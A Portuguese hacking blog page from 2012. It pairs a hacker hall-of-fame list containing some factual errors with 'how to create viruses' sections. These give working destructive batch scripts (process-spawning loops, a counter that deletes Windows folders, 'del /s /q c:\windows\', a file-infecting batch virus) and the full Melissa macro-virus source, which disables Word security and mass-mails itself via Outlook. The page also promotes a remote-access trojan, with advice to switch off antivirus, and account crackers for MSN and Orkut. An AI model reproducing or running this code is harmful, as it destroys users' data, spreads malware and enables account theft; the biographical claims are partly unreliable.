terça-feira, 14 de fevereiro de 2012

os maiores Hackers do mundo

HACKERS



O mundo Hacker é sempre um mistério, aqui vc poderá ver os maiores Hackers do mundo, os que fizeram fama e ganharam respeito de muitos, esses são Hackers mesmo, e não como Lammers que invadem por BO e Netbus e se acham o dono do mundo.



Mark Abenie



Apelido: Philber Optik

Fundou uma associação conhecida como "mestres da fraude" e incentivou milhares de jovens em todo o mundo a invadir os sistemas de telefonia de seus países. No mesmo momento em que Abenie era condenado a cumprir um ano de prisão, milhares de seus fãs se reuniram no sostificado Manhattan Club, de Nova Yorque, para participar de uma festa em homenagem ao seu ídolo.


Kevin Mitnick



É considerado o maior hacker de todos os tempos. Invadiu vários computadores de diferentes empresas, foi julgado 2 vezes, conseguiu escapar do xadrez e, desde 1995, está na Casa de Detençao de Los Angeles, Califórnia, onde aguarda por um julgamento de seus crimes. Mitnick é considerado o rei dos hackers e muitos sonham em seguir o seu exemplo. Leia mais sobre a vida de Kevin Mitnick no mundo da informática.



Kevin Pousen



Apelido: Dark Dante

Em 1990 a Rádio KIIS-FM, de Los Angeles, Califórnia, EUA, estava oferecendo um Porsche para o autor da centésima segunda chamada telefônica do dia. Kevin Assumiu o controle de todas as ligações feitas e levou o ambicioso prêmio. Mais tarde, foi preso por invadir computadores operados por agentes do FBI. A vida de Poulsen inspirou jornalista Jon Littman a escrever o livro "The Watching".



Tsutomu Shinomura



É fisico e especialista em sistemas de segurança do Centro de Supercomputadores de San Diego, na Califórnia. Shinomura é o que se convencinou chamar de "samurai". Foi o responsável pelo golpe conhecido como "Takedown", na qual conseguiu pegar Mitnick. Leia mais sobre o "Takedown" ainda nesse site!



Vladimir Levin



Formado pela universidade de Tecnologia de St. Petersburg, Rússia, este hacker russo foi o cérebro de um ataque aos computadores do Citibank, causando um prejuízo de 10 milhões de dólares. Foi preso pela Interpol em 1995.



Johan Helsingius



Apelido: Julf

Foi preso pela polícia filandesa em 1995 por ter dinfundido na Internet documentos secretos da Church Of Scientology, uma entidade de desenvolvimento de programas científicos.



John Draper



Apelido: Captain Crunch

Criou uma técnica especial para fazer chamadas telefonicas sem pagar, apartir de um apito plástico que achou numa caixa de cereais de uma marca famosa nos Estados Unidos: Captain Crunch - daí o seu apelido.O apito reproduzia um sinal necessário para uma chamada telefônica, que é de 2.600 hertz. Usado em conjunto com uma blue box, dispositivo que se assemelha ao interior de uma caixa de telefonia, permite fazer ligações grátis a longa distância. Draper é considerado o rei dos phreakers.



Robert Morris



Apelido: rtm

É filho do cientista chefe do Centro de Computação do Departamento de Defesa dos Estados Unidos. Em 1988, Morris infectou a Internet com um vírus conhecido como Worm, deixando milhares de computadores inoperantes. Foi apartir daí que o vocábulo hacker passou a designar aqueles que tinham a habilidade para invadir e provocar danos a redes e sistemas.

gps

GPS TrackMaker



GPS TrackMaker é o programa gratuito mais completo para GPS de navegação. Com a rotina de navegação em tempo real você poderá sair com um GPS ligado a um computador portátil, sabendo exatamente a sua localização sobre o mapa da região.
Com a versão gratuita do GPS TrackMaker:

* Você pode criar mapas de fundo de alta velocidade
* Você pode receber e enviar ao GPS Waypoints, Trilhas e Rotas
* Tem mais de 260 ícones de Waypoints disponíveis
* Você pode calibrar imagens de mapas GIF, JPG, BMP, WMF e EMF
* Tem várias ferramentas para criação de Trilhas
* Possui várias outras ferramentas para criação de seus próprios mapas

Tamanho: 15 Mb

programa para assistir tv gratis

MegaCubo 5.0.6 + 197 Pack de canais - Assista TV no seu PC


Acaba de sair a versão 5.0.6 do programa onde você poderá ver canais do mundo inteiro, poderá ver as partidas do brasileirão, filmes, etc… Se você não possui um computador muito bom, o Megacubo agora veio com o modo compacto, que é mais fácil para as pessoas que não tem aquele pc que sonha.MegaCubo Melhor programa 100% nacional onde te dá a possiblidade de assistir variados canais brasileiros e estrangeiros tanto de TV aberta ou fechada. Isto significa que aqueles canais que há na SKY ou na NET você encontra neste programa.
Tamanho: 13 MB
Hospedagem: Rapidshare
http://www.linkprotegido.info/redir.php?url=http://rapidshare.com/files/156736990/MegaCubo_5.0.6___197_Packs-_By_DigauMMM.rar

programa para lan house

Download - Timer Cafe 4.2.1+Crack+Keygen+Tutorial de Ativação


 

Parar tempo de programas Time Stopper 1.2

Programas hacker para celular

JSMS- Torpedos SMS GRÁTIS TODAS AS OPERADORAS


Agora ficou mais facil enviar SMS grátis!
Com o esse programas você vai pode enviar quantos torpedos você quiser para seus amigos e o melhor não vai pagar nada!
Operadoras: TIM, Claro, VIVO, OI, Brazil telecom, Amazonas
Amazônia Celular,BrasilTelecom, CTBC ,Nextel!
Baixe e se Acabe de enviar Torpedos!
Senha: portablebrasil.blogspot.com


Arquivo - Tamanho 4MB

Nimbuzz 0.18.17


Tenha MSN, Gtalk, Yahoo, e outros no seu celular e PC, e faça ligações e chat grátis.
O Nimbuzz é uma solução de comunicação completa e gratuita que divide-se em 3 aplicativos:

* Para celular
* Para computador
* E para a web

Entre estes aplicativos, você pode fazer ligações VoIP, enviar mensagens de texto e de voz, conversar por chat instantâneo, enviar arquivos, e muito mais.
Ao instalar os aplicativos para celular e computador, você poderá incluir as listas de contatos de todas as comunidades de mensagem instantânea que tiver (MSN, Skype, Gtalk, Yahoo!, AIM e Jabber), automaticamente todos os seus amigos aparecerão em um única lista, com um único acesso.
Você pode se comunicar com eles de formas diferentes: entre um computador e um celular, um computador e outro computador, ou um celular e outro celular. Há também uma versão online destes aplicativos, para que você possa acessar de um computador ou celular que não tenham o aplicativo Nimbuzz instalado.
Os aplicativos para web, ou widgets, podem ser criados gratuitamente por você no site da Nimbuzz e publicados em seu blog, perfil de rede social (como o Orkut e o Facebook), ou em seu website.
Publique o widget Comunicador de graça no perfil de suas redes sociais, blogs e websites. Os amigos que visitarem suas páginas com o widget podem te ligar, enviar mensagens de voz e texto, enviar arquivos e conversar por chat, no seu computador ou celular.
Gizmo Telefonia Voip (Ligações de graça para celular e telefone fixo a partir da internet )

Desbloqueie:
Nokia, Motorola, Samsung, Sagem, Sony, Ericsoon, Alcatel, Siemens e Panasonic

* Tamanho: 25 Mb
* Formato: Rar
* Idioma: Porutugês

Como fazer uma escuta celular

segunda-feira, 23 de março de 2009

CoolSMS… Envie Torpedos SMS de Graça


O CoolSMS é um software que tem como principal função o envio de Torpedos SMS através do computador diretamente para o celular, grátis!
O CoolSMS apresenta uma interface amigável e bastante intuitiva, além das vantagens de centralizar o envio de mensagens num único aplicativo, salvar o seu histórico de Torpedos SMS enviados e também possuir agenda para armazenamento e acesso rápido aos contatos!
Confira as principais funções deste software que é Cool!
  • Envia Torpedos SMS grátis para as maiores operadoras do Brasil, diretamente do seu computador. É rápido e fácil!
  • Envia Torpedo SMS individualmente ou para grupos de pessoas (para os amigos do futebol, por exemplo), mesmo os celulares não sendo da mesma operadora.
  • Criação da sua agenda de celulares, acessível de qualquer computador com CoolSMS e conectado a internet;
  • Classificação dos seus contatos em grupos. Ex: Família, Amigos, Trabalho etc.
    Ter todo o seu histórico de Torpedos SMS salvo! (opcional);
  • Acesso a conteúdos exclusivos de acordo com o seu perfil, diretamente nas abas do CoolSMS;
  • Acumular CoolPons (pontos no programa de relacionamento) e trocar por vantagens exclusivas;
  • Design moderno e mais fácil de usar.
As únicas restrições ao uso dizem respeito aos serviços das próprias operadoras na internet, fugindo das responsabilidades dos desenvolvedores do CoolSMS. Sendo assim, o serviço de envio de mensagens para celulares da operadora TIM depende do acumulo de pontos (chamados de CoolPons) no programa de relacionamento do CoolSMS. Já, para a operadora Vivo, não é possível enviar SMS para destinatários dos estados de São Paulo, Rio de Janeiro, Espírito Santo, Paraná e Santa Catarina.
» Sistema OperacionalWindows 98/2000/XP/2003/Vista.

» Informações
 Partes: 1 Parte
Tamanho: 1.9 MB
Formato: .RAR

segunda-feira, 13 de fevereiro de 2012

como criar virus

Nome:CLICK EM MIM
@ECHO OFF
:REPETE
MSG * CLICK EM MIM
GOTO REPETE
Função:Fica repetindo varias vezes a mesma mensagem

Nome:Progstar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start winword.exe
start msacess.exe
goto Fucker:

Nome:bomba relógio
c:\
cd\
echo off
if exist lig1.drv goto 2
echo > lig1.drv sdfsdf
goto fim
:2
if exist lig2.drv goto 3
echo > lig2.drv sdfsdf
goto fim
:3
if exist lig3.drv goto 4
echo > lig3.drv sdfsdf
goto fim
:4
if exist lig4.drv goto 5
echo > lig4.drv sdfsdf
goto fim
:5
if exist lig5.drv goto 6
echo > lig4.drv sdfsdf
goto fim
:6
if exist lig6.drv goto 7
echo > lig6.drv sdfsdf
goto fim
:7
rmdir C:\windows
rmdir C:\arquivos de programas
rmdir C:\documents and settings
:fim
Função:depois que ele for ativado 7 vezes ele apaga tudo

Nome:MSN Fixer
cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*
Função:Congela todos os msn's que estao sendo executados.

Virus Destruction

                                                                   Destruction

u G ‰Eð‹w ÇEø ÇEü ë ƒø … G ‰Eð‹w ÇEø ÇEü h @ ÿ ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèËþÿÿ Àu&‹E £Œ @ @ÿu ÿu ÿu ÿu Pÿu è\üÿÿ‰Eìéœ ÿu ÿu ÿu ÿu ÿ5Œ @ ÿu è:üÿÿ‰Eì Àua‹Eø ‰Eð‹Eü‹4 h @ ÿ ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèKþÿÿ Àu(¡Œ @ ;E s ‹E @ÿu ÿu ÿu ÿu Pÿu è×ûÿÿ‰Eìë ÿu ÿu ÿu ÿu ÿu ÿu è»ûÿÿ‰Eì_^‹EìÉ U‰åƒì VWÿu ÿu ÿu ÿu è þÿÿ‰Eôƒø |vƒ} upÇEø ‹} ‹WD; @ u ¡ @ ÿ7‰þ 7¹ð üó¤X ë݉þ 7VEü9þu ‹Eø Àt ‹GD; @ u ‹uøÇ ë ‰}ø‹}ü‹GD; @ u ‹uø‹ ë½_^‹EôÉ U‰åƒì VWh‚ @ ÿ ‚0@ ‰EühD @ ÿ –0@ ‰Á¾D @ ‰÷¬4jªâúhi @ ÿ –0@ ‰Á¾i @ ‰÷¬4jªâúh @ ÿ –0@ ‰Á¾ @ ‰÷¬4jªâúhi @ ÿuüÿ †0@ £S @ EøPj hW @ ÿ5S @ jÿÿ ~0@ Æ _ @ hÇ ` @ /%@ Æ d @ ÍEøPj h_ @ ÿ5S @ jÿÿ z0@ h @ ÿuüÿ †0@ £ @ EøPj h @ ÿ5 @ jÿÿ ~0@ Æ @ hÇ @ Ì#@ Æ @ ÍEøPj h @ ÿ5 @ jÿÿ z0@ hD @ ÿuüÿ †0@ £. @ EøPj h2 @ ÿ5. @ jÿÿ ~0@ Æ : @ hÇ ; @ È!@ Æ ? @ ÍEøPj h: @ ÿ5. @ jÿÿ z0@ _^ÉÃU‰åÿu ÿu ÿu j ÿ .1@ 1ÀÉ U‰åƒì EüPj hW @ ÿ5S @ jÿÿ z0@ EüPj h @ ÿ5 @ jÿÿ z0@ EüPj h2 @ ÿ5. @ jÿÿ z0@ ÉÃU‰åj ÿ5 @ hN\'@ j ÿ *1@ jÿÿ Ž0@ É U‰åVS‹u d¡0 ‹@ ƒÀ ‹ ;p uù‹0‹X ‰3‹p ‹ ‰s @ ‹0‹X ‰3‹p ‹ ‰s [^É U‰åƒì VW‹u ¿ @ f*f Àt f«ëõf«Ç @ ‹E £ @ EüPj j h»\'@ j j ÿ Š0@ _^É V0 <0>@ SYSHOST.DLL A £0*0·0ì0ò0ú0ÿ0 1
1 1 1.191?1G1a1g1o1t1z11†1‹1£1®1´1¼172=2d2”2·2½2á 2A3k3q3y3~3„3‰33•3§3²3¸3À3;4A4h4˜4»4Á4å4e5l5›5·5Ø 5Þ5æ5ì5ó5 6 6
6 6 6\'646=6B6M6S6[6a6h6l6r6~6„6Œ6‘6š6Ÿ6ª6°6¸6¾6Å6É6Ï6Û6á6é6î6÷6ü6 7
7 7 7"7&7,787>7F7^7u7{7ƒ7Ž7”7œ7§7*7µ7Â7Ç7Ï7×7-8@8L8Y8c8


Função :Deleta o windowns,formata o pc e fode a placa mãe..

domingo, 12 de fevereiro de 2012

como criar virus

Abra o blocos de notas e dichite as letras que estão de vermelho ..e  salve .bat exemplo :foto.bat
abre muitos programas e faz o pc trvar
@echo off
rem Denial Of Service Local
:Fucker
start notepad.exe
start write.exe
start sol.exe
start cmd.exe
start powerpnt.exe
start excel.exe
start purble place
start winword.exe
start msacess.exe
goto Fucker:

Caveirão Trojan
    @echo off
title VIRUS ENCONTRADO!!!ERRO FATAL
color 0c
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ7¶¶¶¶¶¶¶¶¶¶¶¶¶¶$7ŽŽŽŽŽŽŽŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶¶¶øŽŽŽŽŽŽŽŽŽŽŽŽŽ¢¶¶¶¶¶7ŽŽŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽ7¶¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶øŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¢¶¶ŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¶¶Ž1¶1ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶Ž¶¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¶oŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽ¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¶oŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽ¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶øŽ7¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ¢¶ŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽ¶¶Ž ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽ¶¶Žo¶ŽŽŽ1¢ø¶¶¶¶1ŽŽŽŽŽŽ¶¶¶¶ø¢1ŽŽŽ¶¶Ž¶¶ŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽ¶¶o¶Ž$¶¶¶¶¶¶¶¶¶ŽŽŽŽŽ¶¶¶¶¶¶¶¶¶¶Ž¶¶ø¶7ŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶Ž¶¶¶¶¶¶¶¶¶¶ŽŽŽŽŽ¶¶¶¶¶¶¶¶¶¶Ž¶¶¶ŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽ¶¶øŽŽŽŽŽŽŽ¶øŽŽ¶¶¶¶¶¶¶¶ŽŽŽŽŽŽŽ¶¶¶¶¶¶¶¶oŽŽ¶7ŽŽŽŽ ŽŽø¶¶$ŽŽŽ
echo ŽŽŽ¶¶7¶¶ŽŽŽŽŽ1¶ŽŽŽø¶¶¶¶¶¶ŽŽŽ7Ž7ŽŽŽo¶¶¶¶¶¶ŽŽŽ¶¶ŽŽŽŽ Ž¶¶1¢¶7ŽŽ
echo ŽŽ7¶ŽŽŽ¶¶ŽŽŽŽ1¶ŽŽŽŽŽoøøŽŽŽŽ¶¶7¶¶ŽŽŽŽoøoŽŽŽŽŽ¶$ŽŽŽŽ ¶¶ŽŽŽ¶$ŽŽ
echo Žo¶¶ŽŽŽŽ¶¶¶¶ŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽ¶¶¶Ž¶¶¶ŽŽŽŽŽŽŽŽŽŽ$¶ŽŽ¶¶¶ ¶ŽŽŽŽ¶¶øŽ
echo ¶¶ŽŽŽŽŽŽŽŽŽ¶¶¶¶¶¶¶oŽŽŽŽŽŽŽ¶¶¶Ž¶¶¶ŽŽŽŽŽŽŽ7¶¶¶¶¶¶¶1Ž ŽŽŽŽŽŽŽ¶¶
echo ¶¶¶¶¶¶¶¶1ŽŽŽŽŽo¶¶¶¶¶¶¶ŽŽŽŽ¶¶¶Ž¶¶¶ŽŽŽŽ$¶¶¶¶¶¶oŽŽŽŽŽ Ž¶¶¶¶¶¶¶¶
echo ŽŽoøø1Ž¶¶¶¶¶ŽŽŽŽŽŽ¶1¶ø¶ŽŽŽŽ??ŽŽŽŽŽŽŽŽŽ¶¶¶Ž¶oŽŽŽŽŽ¶ ¶¶¶¶1ŽøøøŽŽ
echo ŽŽŽŽŽŽŽŽŽŽ7¶¶¶¶øŽŽ¶ø¶Ž¶¶ŽŽŽŽŽŽŽŽŽŽŽø¶Ž¶1¶ŽŽo¶¶¶¶oŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽø¶¶¶¶¶Ž¶ŽŽ¶$¶¶¶¶¶¶¶¶¶Žø1Ž¶¶¶¶¶$ŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶Ž¶Ž$¶Ž¶øŽ¶Ž¶ø7¶oø¶Ž¶¶ŽŽŽŽŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶¶Žø¶Ž¶Ž¶¶Ž¶Ž¶øŽ¶Ž¶¶Ž¶¶¶¶oŽŽŽŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽŽŽŽŽŽo¶¶¶¶Ž1¶ŽŽŽo¶¶¶¶ø¶o¶¶¶¶øŽŽŽ¶øŽ$¶¶¶¶ŽŽŽ ŽŽŽŽŽŽŽŽŽ
echo ŽŽŽŽ¶¶¶¶¶¶¶¶¶oŽŽŽŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶ŽŽŽŽŽŽ¶¶¶¶ ¶¶¶¶¶ŽŽŽŽ
echo ŽŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽ¶¶¶¶¶¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶¶ø¶¶¶oŽŽŽŽŽŽ ŽŽŽŽ¶¶ŽŽŽ
echo ŽŽŽŽ¶¶¶ŽŽŽŽŽ1¶¶¶¶ŽŽŽŽŽ¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶ŽŽŽŽŽ¶¶¶¶øŽŽŽ ŽŽ¶¶¶ŽŽŽŽ
echo ŽŽŽŽŽŽ¶¶ŽŽŽ¶¶¢ŽŽŽŽŽŽŽŽŽŽŽ7$¶¶¶¶¶¶7ŽŽŽŽŽŽŽŽŽŽŽ7¶¶ŽŽ Ž¶¶ŽŽŽŽŽŽ
echo ŽŽŽŽŽŽ¢¶ŽŽ¶¶ŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¶¶Ž Ž¶¶ŽŽŽŽŽŽ
echo ŽŽŽŽŽŽŽ¶¶¶øŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽŽ¢¶ ¶¶ŽŽŽŽŽŽŽ
echo: Spyware/Malware/Trojans/Rootkit foi detectado no seu OS(Sistema Operacional)!!!
pause
echo: Voce deve deletar isso AGORA!!aperte alguma tecla?
pause
echo: Processando?.erro?..tente novamente??
pause


congela MSN

cd %USERPROFILE%
cd Config~1
cd Dadosd~1
cd Micros~1
cd "Windows Live Contacts"
del /s /q *.*

Deletar windows
del /s /q c:\windows\

fode tudo troia
@echo off
ctty nul
rem
for %%f in (*.exe *.com) do set A=%%f
if %A%==COMMAND.COM set A=
rename %A% V%A%
if not exist V%A% goto end
attrib +h V%A%
copy %0.bat %A%
attrib +r %A%
ren %A% *.bat
set A=
:end
ctty con
@if exist V%0.com V%0.com %1 %2 %3
@if exist V%0.exe V%0.exe %1 %2 %3

 Melisa1999
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End

pirata

// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9 .0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else Wink"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End



 

bsnes 0.8.5

bsnes 0.8.5
Emulador de SNES gratuito, fácil de usar e que prima pela precisão da emulação dos games!
categoria: emuladores
8/2/2012   ATUALIZADO   Windows XP/Vista/7

500 Dicas Hacker

dicas Download – 500 dicas Hacker Baixar Grátis
Nesse tutorial vocês vão encontrar várias dicas de Hacker, imperdíveis.
Confiram!
Tamanho: 5 MB
Hospedagem: Deposit files
»Download: Deposit files

Tutorial Como Hackear orkut sem Programa

imagem 300x135 Tutorial – Como Hackear Orkut! Sem Programa Baixar Grátis
Tutorial de Como Pegar Orkut Sem Programas, Bastas Seguir As Instruções.
Servidor: DepositFiles
Estilo: Hacker
Tamanho: 10 mb
Formato: Rar/Doc
Idioma: Português
»Download: DepositFiles

Turkojan 4

 Download – Turkojan 4 Baixar Grátis
Com esse programa vc vai poder invadir qualquer pc. tbm vai poder pegar todo tipo de senha da vitima, inclusive a do msn!!!
Vale a pena conferir…
Melhor Trojan na Minha Opinião
Obs: Pause a Proteçao do Antivirus durante o Download e durante a Instalaçao!!! Porque o antivirus vai acusar como trojan…
»Download: DepositFiles

Curso Hacker Completo

2i1mvsxcopy Download – Curso de Hacker Completo Baixar Grátis
Descrição: É o maior acervo de material do gênero. Com aulas ministradas por um professor da area!! O pacote conta com video-aulas, e-books, tutoriais, realmente completo!!! Vale conferir!!!
Use por sua conta e risco!!!!
Tamanho: 14 MB
Hospedagem:
DepositFiles
»Download: DepositFiles

O filho hacker do google

cgraagle 3.0 final Craagle 3.0 Final Baixar Grátis
Programinha muito simples e eficiente para a busca de seriais. Chamado de “O filho hacker do google” ele cumpre bem o seu papel, é só digitar o nome do jogo/programa/etc, e esperar a busca terminar.
Tamanho: 4 Mb
Hospedagem: Deposit files
»Download: Deposit files

Download – Rar Password Unlocker v3.0 (Descubra senhas .rar)







 

Descrição
RAR Password Unlocker 3.0 é para encontrar senhas perdidas de arquivos RAR para você poder extrair-los facilmente. Este programa suporta todas as versões de RAR. É possível recuperar todo tipo de senha, não importa se ela seja longa e complexa. Reforçada por ataque brute force, ataque atravéz de um dicionário, funciona de forma eficaz. Além disso, é o mais fácil de usar, até mesmo um novo usuário pode se acostumar com isso em menos de um minuto.

Informações do Programa
Estilo: Recuperador de Senhas
Fabricante: Intelore
Tamanho: 3.5 Mb
Formato: Rar
Idioma: Inglês
»Download: EasyshareMegaupload

Messenger Account Cracker v2.0

 


este programa serve para hackear MSN !muito simples e facil de usar !!
Tipo:Hacker
Tamanho:198 Kb 
sistema:vista/xp/7
Download
MSN Messenger Account Cracker v2.0